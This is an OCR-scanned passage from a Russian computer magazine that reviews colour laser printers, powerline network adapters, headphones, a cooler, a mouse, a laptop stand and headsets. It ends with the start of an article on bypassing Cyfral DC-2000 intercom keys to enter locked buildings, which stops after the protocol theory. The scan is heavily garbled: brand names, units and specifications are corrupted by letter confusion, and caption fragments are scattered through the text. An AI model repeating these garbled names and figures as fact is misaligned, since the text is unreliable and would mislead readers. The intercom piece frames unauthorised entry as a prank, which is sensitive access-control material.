полного завершения задания. Потом распечатка тщательно изучалась 
на предмет ее качества. В процессе работы оценивались шум, время, 



требующееся для начала печати, нагрев устройства. Принтеры у нас 
цветные, поэтому мы распечатывали еще и фотографию размером со 
страницу А4. При этом мы также засекали время и смотрели на то, каким 
вышел отпечаток. Качество выставлялось на максимум, бумага была 
обычная. Помимо этого, внимание обращалось на размеры и внешний 
вид устройства, удобство его использования и возможности драйверов. 
Также мы учитывали, каким образом принтер обеспечивает двусторон- 
нюю печать и какими сетевыми возможностями он обладает. Все-таки 
пара компьютеров дома — это уже отнюдь не редкость. Вне конкурса мы 
протестировали цветное лазерное МФУ. В добавление к вышеописан- 
ным тестам мы замеряли скорость ксерокопирования и сканирования, 
а также проводили все испытания в двух режимах: цветном и черно-бе- 
лом, благо этот девайс умеет работать в них обоих. 
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Сапоп ЬазегБНоі ЬВР 5000 

•••••••••О 



Технические характеристики: 

Максимальное разрешение, сірі: 600 x 600 
Максимальная скорость монохромной печати, стр./мин: 8 
Максимальная скорость цветной печати, стр./мин: 8 
Процессор, МГц: н/д 
Память, Мб: 8 

Двустороння печать: поддержка на уровне драйверов 

Емкость лотка для бумаги, шт.: 250 
Дополнительно: н/д 
Интерфейс: 115В 

Встроенные сетевые возможности: приобретаемая отдельно сетевая 
плата 

Габариты, мм : 407x365x374 
Вес, КГ: 20 

Размеры этого принтера вряд ли позволят тебе свободно установить 
его на твоем рабочем столе, да и весу него немалый, зато выглядит он 
весьма солидно. Переднюю панельукрашает несколько индикаторов, 
которые расскажуттебе, кактвой принтер себя чувствует, не зажевал 
ли он листок бумаги, не заканчивается ли тонер в одном из картриджей. 
В этом смысле тут все очень хорошо: картриджей тут четыре (черный, 
синий, желтый и пурпурный), поэтому если ты редко печатаешь цветные 
страницы, то тебя ждет существенная экономия на расходных матери- 
алах. Меняются картриджи просто: нужно откинуть переднюю панель 
устройства, а дальше все элементарно. Если утебя дома присутствует 
собственная локальная сеть, то тебе, наверное, будет интересно узнать 
о возможности установки в Сапоп ЕавегЭИоі 6В Р 5000 сетевой платы. С 
точки зрения качества результаты теста получились вполне удачными: 
текст четкий и насыщенный, цвета яркие и естественные, тут проблем 
никаких нет. Чуть хуже дело обстоит со скоростью работы: пять тестовых 
страниц печатались 52 секунды, а на фотографию А4 у этой модели ушло 
75 секунд. И уж если говорить о том, чтобы в нем хотелось видеть, так 
это поддержка двусторонней печати. 




НР Соіог Ьа$егЛеі 1600 

•••••••ООО 



Технические характеристики: 

Максимальное разрешение, брі: 600 x 600 
Максимальная скорость монохромной печати, стр./мин: 8 
Максимальная скорость цветной печати, стр./мин: 8 
Процессор, МГц: 264 
Память, Мб: 16 

Двустороння печать: поддержка на уровне драйверов 

Емкость лотка для бумаги, шт.: 250 
Дополнительно: н/д 
Интерфейс: 115В 

Встроенные сетевые возможности: нет 
Габариты, мм : 407x453x370 
Вес, кг: 18 

Этот принтер имеет четыре картриджа, которые легко меняются, лоток 
для бумаги, который торчит сзади в задвинутом положении. На его за- 
дней панели расположены порт 115В и разъем для питания. На лицевой 
стороне расположены кнопки управления, ЖК-э кран и пара лампочек. 
По сравнению с множеством струйных и лазерных принтеров, с кучей 
МФУ и прочей техникой НР, в качестве минусов которой мы всегда 
отмечали длительное время установки и большой размер драйверов, 
у этого принтера в указанной области все в порядке. Драйверы имеют 
обычный размер и ставятся столько же, сколько и у других аналогичных 
устройств. Результаты тестирования таковы: пять тестовых страниц 
заняли у НР Соіог Еавегбеі 1600 61 секунду, а полноразмерная фотогра- 
фия А4 печаталась 63 секунды. Качество печати оказалось не самым 
лучшим. Цвета бледноваты, цветопередача недостаточно естествен- 
ная. Однако с помощью настроек в ПО это можно частично отрегулиро- 
вать. Подключить этот принтер к сети не представляется возможным по 
причине отсутствия у него как сетевого адаптера, так и возможности его 
подключения. Двусторонняя печать поддерживается только на уровне 
драйверов. 
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Хегох РНазег 6110 

••••••0000 

Технические характеристики: 

Максимальное разрешение, сірі: 2400 x 600 
Максимальная скорость монохромной печати, стр./мин: 16 
Максимальная скорость цветной печати, стр./мин: 4 
Процессор, МГц :300 
Память, Мб: 32 

Двустороння печать: поддержка на уровне драйверов 

Емкость лотка для бумаги, шт.: 150 
Дополнительно: н/д 
Интерфейс: 115В 

Встроенные сетевые возможности: нет 
Габариты, мм : 390x344x265 
Вес, кг: 13,6 

По сравнению с другими участниками тестирования этот принтер имеет 
очень существенный плюс, который наверняка заинтересует домашних 
пользователей, — его небольшие размеры и вес. Принтер относительно 
легко размещается дома, что выгодно отличаетего от других участни- 
ков, требующих прямо-таки «аэродромы для посадки». Внешний вид 
этого устройства довольно обычный, так что интерьер он неукрасит, но 
и не испортит. К достоинствам следует отнести раздельные, легко заме- 
няющиеся с передней панели картриджи, информативные индикаторы 
на передней панели и быструю печать фотографий (22 секунды). Но 
вот качество ее отнюдь не выдающееся, цвета не очень естественные, 
само фото темноватое. Чтобы сделать фотопечать более естествен- 
ной, придется отдельно настраивать параметры печати в драйвере. 
Текст маленького размера получился довольно плохо. Тестовый блок 
печатался медленно, 83 секунды. Еще этот принтер сильно шумит и 
долго «думает» перед тем, как выдать первую станицу. Впрочем, перед 
последующими — тоже. Кстати, если ты обладатель домашней сети, то 
для тебя есть сетевая модель этого устройства. 



Технические характеристики: 

Максимальное разрешение, брі: 600 x 600 
Максимальная скорость монохромной печати, стр./мин: 16 
Максимальная скорость цветной печати, стр./мин: 4 
Процессор, МГц: нет данных 
Память, Мб: 128 

Двустороння печать: поддержка науровнедрайверов 

Емкость лотка для бумаги, шт.: 150 

Дополнительно: ІІ5В-портдля прямой печати с носителей 

Интерфейс: Ы5В 

Встроенные сетевые возможности: сетевая плата 
Габариты, мм : 413x353x333 
Вес, кг: 20,3 

Вне конкурса этот девайс оказался по одной простой причине: это не 
просто лазерный принтер, а цветное многофункциональное устройство, 
сочетающее в своем компактном корпусе (эта компактность — очень 
большой плюс) возможности принтера, сканера и копира. Крометого, 
он оснащен встроенной сетевой платой, что даеттебе возможность 
подключить его к своей сети. Еще одна изюминка — порт 115В для пря- 
мой печати с соответствующих носителей. Так что функций тут действи- 
тельно много, это настоящее МФУ. Также к плюсам можно отнести лей- 
коза меняемые раздельные картриджи, для замены которых достаточно 
открыть переднюю панель. Это повышает экономичность и эргономич- 
ность устройства. На передней панели ты найдешь кнопки управле- 
ния и ЖК-дисплей, который, помимо всего прочего, информирует и о 
количестветонера в картридже. Скоростные показатели неплохие даже 
по сравнению с остальными участниками теста. Смотри сам: пять наших 
тестовых страниц распечатались в цвете за 83 секунды, черно-белый 
вариантбыл готов за 26 секунд; копирование листа в цвете отнялоу 
нас минуту, в черно-белом варианте — 20 секунд. Сканированиетой 
же тестовой страницы заняло столько же времени, что и копирование. 
Качество при этом было высоким, также как и при скане фотографии. 
Разворот книги, объемного предмета, также отсканировался неплохо, 
но книгу лучше прижимать посильнее. Ах да! На распечатку тестовой 
фотографии размером А4ушло 45 секунд. Она получилась немного 
бледная, а в остальном — высокого качества. 




5ат5ітд СІ.Х-2160ІМ 

Вне конкурса 
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Технические характеристики: 

Максимальное разрешение, сірі: 600 x 600 

Максимальная скорость монохромной печати, стр./мин: 12 

Максимальная скорость цветной печати, стр./мин: 10 

Процессор, МГц: ЗОО 

Память, Мб: 64 

Двустороння печать: есть 

Емкость лотка для бумаги, шт.: 150 

Дополнительно: кардридер 

Интерфейс: 115В 

Встроенные сетевые возможности: сетевая плата 
Габариты, мм : 407x453x492 
Вес, кг: 23 Р 6 

Этотпринтер имеет в себе явные следы проникновения влазерные 
принтеры моды их вечных соперников — струйныхустройств. Это встроен- 
ный кардридер, предназначенный, каклегко догадаться, для прямой пе- 
чати с карт памяти. Что ж, полезная функция. Из других интересных вещей 
в нем есть встроенная сетевая плата, два лотка подачи бумаги и слот поли- 
стовой подачи. Крометого, присутствует возможность печатать на обеих 
сторонах листа. Органы управления представлены четырьмя кнопками, 
двумя индикаторами иЖК-экраном, расположенными сверху на передней 
панели принтера. Там показывается, сколько осталосьтонера в каждом из 
четырех картриджей. Все они легко могут быть заменены через переднюю 
панель. Это удобно, а раздельные картриджи существенно экономяттвои 
средства. Качество печати кактестовой страницы, так и фотографии было 
высоким, придраться не к чему: цвета насыщенные и естественные; текст, 
даже самый мелкий, пропечатан четко. Время, ушедшее на работу с пятью 
тестовыми страницами, составило 47 секунд, а фотография отняла у нас 22 
секунды. Если бы ещедрайверы небылитакими огромными и ихустанов- 
ка не занимала столько времени, все было бы вообще отлично. 




Технические характеристики: 

Максимальное разрешение, брі: 600 x 600 
Максимальная скорость монохромной печати, стр./мин: 8 
Максимальная скорость цветной печати, стр./мин: 6 
Процессор, МГц: 350 
Память, Мб: 64 

Двустороння печать: поддержка на уровне драйверов 

Емкость лотка для бумаги, шт.: 140 
Допол н ител ьно : может быть цветным 

Интерфейс: 115В 

Встроенные сетевые возможности: сетевая плата 
Габариты, мм : 431 x 518 x 425 
Вес, кг: 34,3 

Большой и тяжелый принтер от Ерзоп, он обладает несколько нестан- 
дартной, ноудобной компоновкой. Чтобы не затягивать, сразу расскажу 
тебе о его главной особенности: он можетбыть как цветным, так и моно- 
хромным! Все зависит оттого, какие картриджи ты в него установишь: 
один или шесть черных, что увеличивает его ресурс, или цветные и чер- 
ный, тогда он будет печатать несколькими цветами. Заменяются тонеры 
легко, через переднюю панель. Кдругим особенностям можно отнести 
наличие порта БРТ (вкупе со стандартным 115В) и сетевой платы. На 
передней панели находится большой (для принтера) ЖК-дисплей, а 
также кнопки управления. Из недостатков устройства можно смело 
назвать его большие габариты и вес. А вот достоинства — это качество 
и скорость печати. Цвета на фотографии естественные и яркие; текст 
печатается четко, независимо отего размера. На пять тестовых страниц 
принтер потратил 25 секунд, а на полноценную тестовую А4-фотогра- 
фию — 20 секунд. 

Выводы 

Лазерные принтеры подтвердили свою репутацию быстрых, качест- 
венных и надежных устройств. Для офиса ты определенно не найдешь 
ничего лучше. Однако для такой задачи, как печать фотографий, лучше 
подойдет старый добрый струйный принтер с фотобумагой, так как на 
лазернике этот вид графики получается хоть и четким, но не глянцевым, 
а каким-то газетным, даже на специальной фотобумаге для лазерной 
печати. В общем, у этих устройств есть свой спектр задач, которые они 
выполняют на отлично, но вот для домашнего применения, особенно 
если учесть их габариты и цену, их следует рекомендовать с оглядкой. 
Как бы там ни было, выбором редакции сегодня становится Сапоп 
ЕазегЭИоІ БВР 5000, который обладает высокими скоростью и качест- 
вом печати. А лучшая покупка — это Хегох РИазег 61 1 0 из-за небольших 
габаритов и цены. ~зг 



ІезЫаЬ выражает благодарность за предоставленное на тестирование оборудование российским представительствам компаний Сапоп, НР, Батзипд, Ерзоп и Хегох. 
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Сеть через 

электрическую розетку! 

Обзор комплекта М5І еРоѵѵег 200АѴ 

Какие типы сетевых подключений ты можешь назвать сходу? Ну, наверное, первое, что 
приходит на ум, — это ЕіЬегпеі: по витой паре, АОЗЬ (и другие разновидности хОЗЬ), ор- 
ганизация последней мили по коаксиальному кабелю и, пожалуй, беспроводные интер- 
фейсы. Все эти названия вошли в нашу повседневную жизнь за счет обилия рекламы и 
упоминаний в СМИ. Некоторое время назад заговорили и об «интернете через розетку», 
или, говоря научным языком, роѵѵег Нпе соттипісагіоп (далее РЬС) . Появление на рынке 
интернет-провайдинга оператора, использующего для доступа своих абонентов техноло- 
гию РЬС, в какой-то степени произвело фурор, но из-за небольшого количества рекламы 
популярным этот вид подключения в нашей стране назвать не нельзя. 

Однако в последнее время появилось большое количество абонентского РЬС-оборудования 
от именитых производителей. Об одном из таких комплектов и пойдет речь в этой статье. 



Технология РЮ 

По сути дела, физика процесса передачи данных по электрическим 
сетям очень схожа с технологиями х05Ц применяющими телефонные 
сети общего пользования. Оборудование РІ_С включается в электричес- 
кую сеть и задействует для передачи данных диапазон несущих частот 
от 1 ,6 до 30 МГц. Канал передачи данных образуется 84 поднесущими 
частотами. Используется полудуплексный режим передачи (то есть либо 
только прием, либотолько передача). Поскольку электрическая сеть 
единственная и в ней одновременно может находиться несколько пе- 
редающих адаптеров, имеет место разделение физической среды. Для 
организации доступа ксреде применяется протокол С5МА/СА (Саггіег 
зепзе тиШрІе ассеззѵѵііЬ соііізіоп аѵоісіа псе) . В отличие от классичес- 
кого для В бете!- сетей метода С5МА/С0 (соііізіоп беіесііоп), здесь каж- 
дый раз после передачи кадра станция ждет подтверждения приема. 
Если подтверждение не получено, считается, что произошла коллизия, и 
через случайный промежуток времени передача повторяется снова. 

В РІ_С также организован механизм мониторинга канала передачи на 
предмет выявления частотных подканалов, на которых соотношение 
сигнал/шум превышает допустимое значение. В случае обнаружения 
таковых РЮ-адаптер перенастраивает свой модулятор. 

Разновидности стандартов НотеРІид 

Вообще говоря, популярность РІ_С крайне низка. Обусловлено это 
прежде всего сложностью сертификации подобного рода оборудования 
в ряде стран. Однако более полусотни компаний продолжают выпускать 
соответствующее оборудование. Эти производители образуют НотеРІид 
Роѵѵегііпе АШапсе. На данный момент ими приняты 3 стандарта: 



НотеРІид 1 .0, НотеРІид 1 .0 ТигЬо и НотеРІид АѴ. Первый из них — са- 
мый старый и обеспечиваетскорость передачи до 14 Мбит/сек, второй 
— его ускоренная версия, позволяющая поднять скоростную планку до 
85 Мбит/сек. НотеРІид АѴ— наиболее современная версия стандарта, 
изначально разработанная сучетомтребований, предъявляемых пакетом 
услуг Тгіріе Ріау. Теоретически максимальная скорость по стандарту 
составляет200 Мбит/сек. Помимо скоростныххарактеристик, в последней 
версии стандарта также были доработаны функции шифрования переда- 
ваемой информации. 

Внешний вид и комплектация 

К нам в руки попал комплект из двух одинаковых М5І еРоѵѵег 200АѴ в 
одной большой коробке. Вместе с каждым из них поставляется Сй с 
утилитой настройки, патч-корд ІЯР длиной около 1 ,5 метров и краткая 
инструкция поустановке. Внешнедевайс похожна массивный адаптер 
питания. На лицевой стороне находятся светодиоды индикации пита- 
ния, обнаружения других устройств НотеРІид и активности сегментов 
ЕіЬегпеІ и Роѵѵегііпе. 

Приступаем к работе 

После подключения Роѵѵегііпе-адаптера кэлектросети и соединения 
его с компьютером посредством патч-корда (кслову Еібегпеі-порт в М5І 
еРоѵѵег 200АѴ автоматически определяет полярность, что позволяет под- 
ключать его как напрямую к станции, так и через коммутатор) следуетуста- 
новить с СО, входящего в комплектацию, специальную утилиту настройки. 
Она просканируетсеть, определитлокальный Роѵѵегііпе-адаптер, после 
чего начнется поискудаленных мостов. Кактолькоони будут найдены, 
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соединение с ними можно будет установить, введя парольудаленного приема — 36,44 Мбит/сек, а при одновременной передаче в обе стороны 

адаптера (он указан на наклейке со стороны вилки питания]. После этого —43,35 Мбит/сек. Как видно, скоростные показатели существенно от- 

связь сегментов будет «прозрачна», начиная с третьего уровня модели 051 л и чаются от заявленного максимума, однако запаса по скорости должно 
(в нашем случае ІР). Осталосьтолько понять, насколько она будет быстра. хватить даже для передачи РЮ-видеоконтента через Роѵѵегііпе-соединение. 



Методика тестирования 

Длятестирования проводного сегмента использовался программный 
продукт ЫеШ СЬагіоі и скриптТЬгоидбриі с передачей пакетов макси- 
мального размера. На двух станцияхустанавливалисьтак называемые 
епфоіпі-программы, затем в консоли ЫеШ СЬагіоі запускался скрипт 
генерации трафика. 

Длятестирования пиковой скорости передачи по электросети мы взяли 
два одинаковых адаптера М5І еРоѵѵег200 АѴ, каждый из которых был 
подключен к своей станции. После установки соединения между адапте- 
рами с консоли ЫеШзапускался скрипт генерации трафика. Измерялась 
скорость передачи поочередно в каждом из направлений (от первого 
адаптера ко второму и обратно) и при одновременной передаче (псев- 
доРйХ). Также мы проверяли, насколько отличается скорость при разном 
удалении Роѵѵегііпе-адаптеров друготдруга. 

Результаты тестов 

При включении адаптеров в сеть в непосредственной близости друг от 
друга скорость передачи составляет 27,9 Мбит/сек, скорость приема 
— 39,13 Мбит/сек, при одновременной передаче в оба направления про- 
пускная способность канала достигает 46, 7 Мбит/сек. В случае удаления 
адаптеров друготдруга примерно на 5 метров скоростные показатели 
немного падают. Скорость передачи втаком случае составляет25 Мбит/сек, 



Выводы 

Итак, мы рассмотрели возможности Роѵѵегііпе-оборудования сточки 
зрения организации сети в домашних условиях при использовании уже 
имеющейся электропроводки. Как показывают результаты нашихтестов, 
этот вид соединения обеспечивает вполне приемлемую скоростьи 
избавляет от необходимости прокладки новых проводов в квартире. Цена 
решения от М5І пока довольно высока, зато рассматриваемый комплект 
поддерживает все принятые на данный момент спецификации НотеРІид 
и изначально содержит все необходимое для создания домашней 
Роѵѵегііпесети.^с 



{езфаЬ выражает благодарность за предоставленное на тестирование 
оборудование российскому представительству компании М5І. 



Скорость соединения М5І еРоѵѵег 200АѴ 




О 5 10 15 20 25 30 35 40 45 50 

Мбит/сек 



Скорость соединения М5І еРоѵѵег 200АѴ: на графике представлена про-И 
пускная способность Роѵѵегііпе-соединения в зависимости от расстояния 
м ежду ада пте ра м 
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Технические характеристики: 

Акустическое оформление: закрытое 
Диапазон частот: 20-20000 Гц 
Сопротивление: 32 0 м 

Чувствительность: 113 дБ/121 дБ (с включенной системой 
шумоподавления) 

Диаметр мембраны: 30 мм 
Кабель: 1,5 м 
Штекер: Зр5 мм 




1. Наушники Піітіх РН -600 изготовлены из пластика черного цвета. 
Амбушюры сделаны из кожзаменителя, а оголовье может регулировать- 
ся. Конструкция полностью складная, поэтому наушники удобно брать с 
собой в поездку. Кроме того, в комплекте поставляется бархатный чехоль- 
чик, в который наушники с легкостью помещаются. 

2. Помимо самого чехла, в комплект входит батарейка типа ААА, пере- 
ходник на джек 6,3 мм и переходнике вилкой на мини-джекЗ,5 мм, чтобы 
наушники можно было использовать в самолете. 

3. Интересной особенностью этих наушников, несвойственной бюджет- 
ным моделям, является поддержка технологии активного шумоподав- 
ления. Собственно, для этого в комплект и входит батарейка. В процессе 
работы генерируется сигнал в режиме противофазы к шуму из внешней 
среды. Так, например, при включении АШП шум метро будет слышен 
меньше. 

4. Функция АШП включается с помощью пульта, идущего в комплекте. На 
нем предусмотрена прищепка для крепления кодежде. Но даже если не 
включать эту систему, динамики радуют качественным глубоким басом, а 
также чистотой воспроизведения. В дополнение отметим, что, по сравне- 
нию с аналогичными моделями, Піітіх РН -600 стоят вполне приемлемо. 

0 

1. Хлипкая конструкция может оттолкнуть любителей солидных агрега- 
тов. Подушечки прилегают кушам неплотно. Пультуправления весьма 
громоздкий — путешественникам он может показаться не слишком удоб- 
ным в эксплуатации. При постоянном использовании технологии АШП 
придется менять батарейки. 



Технические характеристики: 

Поддерживаемые разъемы: только І-6А775 
Размеры кулера : 92x92x53 мм 
Размеры вентилятора: 80x80x25 мм 
Материал: медь 

Тепловое сопротивление: 1,8°С/Вт 
Воздушный ПОТОК: ~ 34 , 46 СРМ 
Уровень шума: ~22 дБ 
Время наработки на отказ: 50000 часов 
Тип подшипника: качения 




1. Несмотря на свои весьма компактные размеры (кулер не больше боксо- 
вого), внешний вид внушаетуважение. Во-первых, радиатор изготовлен 
полностью из меди. Из алюминия сделантолько несущий каркас конс- 
трукции. Для своих размеров Зріге 5Р507В7-ІІ ВіатопсІСооІ удивительно 
тяжелый. Охладитель использует четыретепловыетрубы, что весьма 
необычно для бюджетной модели. Толщина их всего лишь 4 мм. 

2. Радиатор набран из 55 ребер, которые посажены достаточно плотно. С 
процессором контактирует медное основание. Толщина основания около 
7 мм, а расстояние между ребрами порядка 1,5 мм. 

3. Вентилятор сделан из полупрозрачного голубого пластика, но на под- 
светку рассчитывать не стоит. Форма каркаса довольно необычна, что бла- 
гоприятно отражается на внешнем виде Зріге 5Р507В7-ІІ ОіатопсІСооІ. 

0 

1. Несмотря на свои достоинства, показанные по сравнению с бюджетны- 
ми моделями кулеров, это устройство отЗріге работает достаточно шумно. 
Если говорить об установке, конструкция не оченьудачна. Если придется 
менятьтермопасту на процессоре или производитьс ним какие-либо 
другиедействия.тоснятьохладительбез извлечения системной платы 
из корпуса не получится. Кулер способен работать только с процессорами 
Іпіеі под разъем ЕѲА775. 

Результаты тестирования: После 30 мин работы (закрытый 
корпус). Работает толь ко ОС: 42°С. Нагрузка 5&М 100 %: 74 °С. После 30 
мин работы (открытый корпус). Работает толь ко ОС: 40°С. Нагрузка 5&М 
100 %: 71 °С. 

Тестовый стена: Процессор: ІпІеІСоге 2 Био Е6700. Материнская 
плата: М 51 975Х Ріаііпит. Память: 2x512 Мб, Кіпдзіоп НурегХ ББК2-800. 
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РІ 05 іоп Ьа$ег 
Мойве СоЬга 

Лазерная мышь с хвостом 




Технические характеристики: 

Среда передачи: проводная 
Тип мыши: лазерная 
Разрешение: ібоо точек на дюйм 

Интерфейс подключения: 115В 
Количество кнопок: 2 штуки 
Наличие колеса прокрутки: есть 
Материал: пластик 
Вес: 120 г 




1. Корпус выполнен из прозрачного голубого акрила. Таким образом, 
все внутренности рассматриваемой мышки становятся доступны взору 
пользователя. Логотип компании крупными буквами нанесен на лицевую 
сторону корпуса. Мышка снабжена яркой подсветкой, причем светится не 
только колесо прокрутки, но и торцевые накладки. 

2. Что касается клавиш, то мышь оборудована всего двумя основными 
кнопками, не считая колесика прокрутки. Клавиши сделаны из пластика, 
но пальцы по ним не скользят, несмотря на отсутствие специального пок- 
рытия. Колесико резиновое, проворачивается без лишнихусилий, однако 
нажимается туго. Благодаря специальной форме основные клавиши 
оченьудобны. 

3. Ктыльной стороне устройства прикреплены тефлоновые накладки 

— мышка скользит легко и непринужденно. Разрешение — 1 600 точек на 
дюйм, но регулировать его нельзя, это не предусмотрено ни дизайном 
устройства, ни программным обеспечением. 




ЬодііесН АНо 

Подставка под ноутбук 
с клавиатурой 



$100 



Технические характеристики: 

Материал: пластик, резина 
Цвет: черный 

Интерфейс передачи данных: 115В 
Количество дополнительных клавиш: 5 штук 
Поддерживаемые ОС: любые 
Размеры (в сложенном виде): 237x428x36 мм 




1. Компания БодііесЬ совсем недавно выпустила устройство, которое мо- 
жет быть воспринято пользователями двояко. Кто-то скажет, что подстав- 
ка для ноутбука Бод іІесЬ АІТо — бесполезное в быту устройство и пустая 
трата денег, а кто-то может активно заюзать этот интересный девайс дома 
или на работе и извлекать из него максимум пользы. 

2. Подставка представляет собой раскрывающийся, как книга, пластико- 
вый ящик. На одной стороне предусмотрена полноразмерная клавиатура, 
а на другой — стойка с кабелем для подключения. Фактически пользо- 
ватель получает клавиатуру с несъемным аттачем для крепежа ноутбука. 
Выдерживаеттакое устройство вес около 4 кг, так что использовать его 
лучше с ноутбуками среднего размера и меньше. 

3. На подготовку устройства к работе, по заявлению производителя, 
должно уйти всего 30 с. Этот показатель соответствует действительности. 
Много ли времени нужно на то, чтобы разложить ноутбук и подключить к 
нему кабель 115В? Кнопки на клавиатуре высокие, однако практически не 
шумят. Клавиатура заслуживает самых высоких похвал. 

4. Дополнительных кнопок всего пять. Помимотого, клавиатура оснащена 
регуляторами громкости и клавишами для быстрого запуска приложе- 
ний. Бод Н;есЬ снова порадовала качественной сборкой и элегантным 
исполнением. Для оформления подставки выбрано сочетание матовых и 
глянцевых поверхностей черного цвета. Помогают в работе и оранжевые 
индикаторы. 



0 

1. Резиновые накладки на боковых панелях продавливаются внутрь, что, 
конечно, нельзя считать серьезным минусом, но смотрится это крайне 
странно. Жесткие края пластика не обработаны. Вряд ли эти элементы 
конструкции смогут поранить пользователя, однако в некоторых случаях 
работать некомфортно. 



0 

1.1 00 долларов за клавиатуру — это немало. Даже если она снабжена 
таким полезным в быту устройством, как подставка под ноутбук. Малотого, 
клавиатура неотделима отсвоего продолжения. Использовать отдельно 
клавишный манипулятор не получится. Поверхность с легкостью подвер- 
гается повреждениям — царапинам. 



БзЫаЬ выражает благодарность за предоставленное на тестирование оборудование компаниям «БЮРОКРАТ» (т. (495) 745-551 1 , ѵѵѵѵѵѵ.Ьиго.ги) , 
Аісотігасіе (т. (495) 788-151 1 , ѵѵѵѵѵѵ.аісотігасіе.ги ). а также российским представительствам компаний БодііесИ и Піітіх. 
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[Специальная катушка, на| 



|которую удобно наматы-| 



|вать излишки провода 



Под пластиком нахо- 



[/добный зажим, с по- 



|дится миниатюрная 



|мощью которого можно 



[микросхема идущей 



Разъемы для подклю- 



|собрать провода и закре-| 



в комплекте сушами 



Знаешь, что меня смущает в обычной гарнитуре? Ее конструкция. Наде- 
ваешь наушники и сразу ощущаешь себя телефонисткой из саіі-центра: 
«Компания «Хакеры на луне», да... соединяю». Хорошо, если ты сидишь 
дома, а если в офисе? Лично мне гораздо приятнее и удобнее исполь- 
зовать гарнитуры со скрытым креплением, таким каку ЗеппЬеізег РС 
146. На этом, впрочем, удобства не заканчиваются: помимо обычного 
регулятора громкости, ты получаешь кнопку для отключения микрофо- 
на. Асам микрофон не придется долго крутить, чтобытвой собеседник 
тебя услышал. Он захватываеттвою речь из любой позиции и удаляет 
посторонние звуки с помощью функции шумоподавления. 



Технические характеристики: 

Наушники: 

Частота: 40-20 000 Гц 

Сопротивление: 32 0м 
Звуковое давление: 118 дБ 

Микрофон: 

Частота: 80-15 000 Гц 

Чувствительность: (-) 38 сІВѴ/Ра 
Сопротивление: 2 кОм 
Длина кабеля: 3 м 
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Удобные дужки с мягкой 



|подушечкой ре гул и ру-| 



ются под любой размер 



Подушечки подавляют 



[посторонние шумы и 



делаюттак, чтобы твои 



Іуши чувствовали себя 



|комфортно 



Эластичное крепление 
микрофона позволяет! 
легко менять его^ 

пбдожениеН 



л! Это не просто микрофон с наушниками. Компания Эеппбеізег спе- 
циально разработала эту модель для самых придирчивых потребителей 
— профессиональных геймеров. Эти увлеченные парни хотят самую 
полную звуковую картину без даже намека на фальшь. АЗеппбеізег РС 
161 115В как раз может предложить то, что им нужно: кристально чистый 
звук и максимальный реализм, достигаемый за счет технологи и 30- 
звучания. Поверь: с обычной гарнитурой ты такого не получишь. И это 
совершенно точно порадует тебя независимо оттого, являешься ли ты 
профессиональным игроком или нет. 



Технические характеристики: 

Наушники: 

Частота: 15-23 000 Гц 

Сопротивление: 32 0м 
Звуковое давление: 118 дБ 

Микрофон: 

Частота: 80-15 000 Гц 

Чувствительность: (-) 38 сІВѴ/Ра 
Сопротивление: 2 кОм 
Длина кабеля:3м 






Аргентина, Австралия, Австрия, Бельгия, 
Канада, Канада, Чили, Дания, Франция, Герма- 
ния, Ирландия, Италия, Мексика, Нидерлан- 
ды, Новая Зеландия, Норвегия, Португалия, 
Россия (Москва, Санкт-Петербург), Испания, 
Швеция, Великобритания, США. 

1,7 евроцента 



США, Канада, Китай, Германия, Италия, 
Япония, Сингапур, Тайвань, Великобритания, 
Австрия, Австралия, Южная Корея, Малайзия, 
Польша, Испания, Швейцария, Аргентина, 
Бельгия, Дания, Франция, Ирландия, Швеция, 
Нидерланды, Португалия. 

от 1,9 до 2,9 центов 



1) Москва, Санкт-Петербург. 

2) США, Германия, Украина, Армения, Австра- 
лия, Израиль, Китай. 



1)$0 

2) $0,027-$0,08 
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Дурим помофон 

Как обмануть домофон компании СуігаІ 

Ты не силен в программировании микроконтроллеров? Ты не смог сделать дубликат ключа, как 
учил тебя «Хакер»? Твоя подруга смеется над тобой, когда железный болван-домофон не пропус- 
кает тебя? Не унывай — «Хакер» в очередной раз найдет для тебя решение, позволив проник- 
нуть сквозь неприступные двери под звуки музыки. 



А как же ключ от всех дверей? 

В сентябрьском номере за прошлый год «Хакер»уже рассказывал отом, как 
самому изготовить универсальный ключ от домофонов. В качестве основ- 
ной части нашего девайса мытогда использовали хитрый микронтроллер. 
Но всякомули крутому перцу охота ковыряться в ассемблере и отладчике, а 
также корпеть над столом с паяльником, когда за окном лето/пиво/друзья/ 
девушка (нужное подчеркнуть)? Тем более что все чаще на просторах нашей 
родной страны встречаются странного вида ключи, у которых не в пример 
обычным вовсе нетзаветного номера (какты понимаешь, нужного для того, 
чтобы снятье него копию по нашему методу), зато есть загадочная надпись 
«Суітаі». Не будем темнить и скажем сразу, что Субга I — это отечественный 
продукт, та к сказать, наш ответ Чемберлену. Уделим же вниманиеэтому 
девайсу и попробуем на прочность этот«орешек»... 

Экскурс в теорию, или практика потом 

За последние несколько лет идентификаторы ТоисЬ Мегтюгу 051 990 от 
фирмы ОаНаз Зетісопсіисіюг заняли лидирующее место на рынке систем 
контроля доступа. Малогабаритные, выполненные в прочном металли- 
ческом корпусе, они смогли удовлетворить практически все запросы 
российских потребителей. В общем, чего рассказывать: каждый видел 
эти «таблетки» сотню раз. Впрочем, подделать та кой ключ оказалось 



очень просто: достаточно было лишьсчитать код, зашитый в ключ-иден- 
тификатор. В 2000 году компания «Цифрал» разработала и запатентовала 
собственный цифровой электронный идентификатор ТоисЬ Мегтюгу 
Субгаі ОС-2000. Отечественная разработка была призвана устранить 
ряд недостатков. Она была проста в производстве, и ее быстро освоили 
отечественные предприятия. 

В документации к контактному цифровому ключу 00-2000 (ТоисЬ Метогу 
Суітаі) приведено следующее описание его работы: «Корпус ВС-2000 
аналогичен по конструкции и размерам корпусу Оаііаз 081 990. Он сделан 
из нержавеющего металла. Диаметр диска около 17 мм, толщина 5,89 мм. 
Полый внутри диск состоит из двух электрически разъединенных частей. 
В герметичную полость помещена электронная схема на кремниевом 
кристалле. Выход схемы соединен с половинками диска двумя провод- 
никами. Ободок и донышко представляют собой земляной контакт, а 
крышечка выполняет функцию сигнального контакта. 

Микросхема 00-2000 работает по собственному уникальному протоколу. 
При контакте со считывающим устройством 00-2000 начинает выдавать 
циклические кодовые комбинации, состоящие из стартового и восьми 
информационных слов. Стартовое слово отличается от информационного 
количеством единищтри единицы подряд и один ноль. Информационное 
слово — одна единица итри нуля. 
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<орпус йС-2000 — это та же самая таблетка 




Положение единицы в каждом информационном слове программируется 
индивидуально на этапе изготовления микросхемы ключа 00-2000. При- 
мененнаятехнология позволяет получить аж 65536 кодовых комбинаций! 
Выдача кодовой комбинации происходит посредством изменениятока 
